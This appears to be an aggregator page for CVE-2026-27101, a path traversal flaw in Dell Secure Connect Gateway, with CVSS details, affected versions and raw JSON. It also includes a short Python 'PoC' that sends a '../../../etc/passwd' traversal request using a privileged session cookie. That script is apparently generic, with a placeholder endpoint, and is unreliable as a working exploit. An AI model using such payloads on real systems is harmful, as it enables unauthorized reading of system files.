Security Vulnerability Report
中文
CVE-2026-27101 CVSS 4.7 MEDIUM

CVE-2026-27101

Published: 2026-04-01 08:16:05
Last Modified: 2026-04-02 20:42:37

Description

Dell Secure Connect Gateway (SCG) 5.0 Appliance and Application version(s) 5.28.00.xx to 5.32.00.xx, contain(s) an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability. A high privileged attacker within the management network could potentially exploit this vulnerability, leading to remote execution.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:dell:secure_connect_gateway:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:dell:secure_connect_gateway:*:*:*:*:application:*:*:* - VULNERABLE
Dell Secure Connect Gateway 5.0 Appliance 5.28.00.xx to 5.32.00.xx
Dell Secure Connect Gateway 5.0 Application 5.28.00.xx to 5.32.00.xx

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-27101 Path Traversal in Dell SCG # Note: Requires High Privileged Account within Management Network target_url = "https://<target-ip>/api/v1/file" headers = { "Cookie": "session_id=HIGH_PRIVILEGED_SESSION_TOKEN", "User-Agent": "Mozilla/5.0" } # Malicious payload attempting to traverse directories # Replace '../../../etc/passwd' with actual sensitive endpoint based on analysis payload = { "path": "../../../etc/passwd" } try: response = requests.get(target_url, headers=headers, params=payload, verify=False) if response.status_code == 200: print("[+] Exploit successful! Response:") print(response.text) else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27101", "sourceIdentifier": "[email protected]", "published": "2026-04-01T08:16:05.270", "lastModified": "2026-04-02T20:42:37.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Secure Connect Gateway (SCG) 5.0 Appliance and Application version(s) 5.28.00.xx to 5.32.00.xx, contain(s) an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability. A high privileged attacker within the management network could potentially exploit this vulnerability, leading to remote execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:secure_connect_gateway:*:*:*:*:-:*:*:*", "versionStartIncluding": "5.28.00.00", "versionEndExcluding": "5.34.00.00", "matchCriteriaId": "EA06F310-304F-4729-BBD3-8EB69179D32B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:secure_connect_gateway:*:*:*:*:application:*:*:*", "versionStartIncluding": "5.28.00.00", "versionEndExcluding": "5.34.00.00", "matchCriteriaId": "4D7262CE-373D-40DB-826E-1AB4ADDAF250"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000438589/dsa-2026-020-security-update-for-dell-secure-connect-gateway-application-and-appliance-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}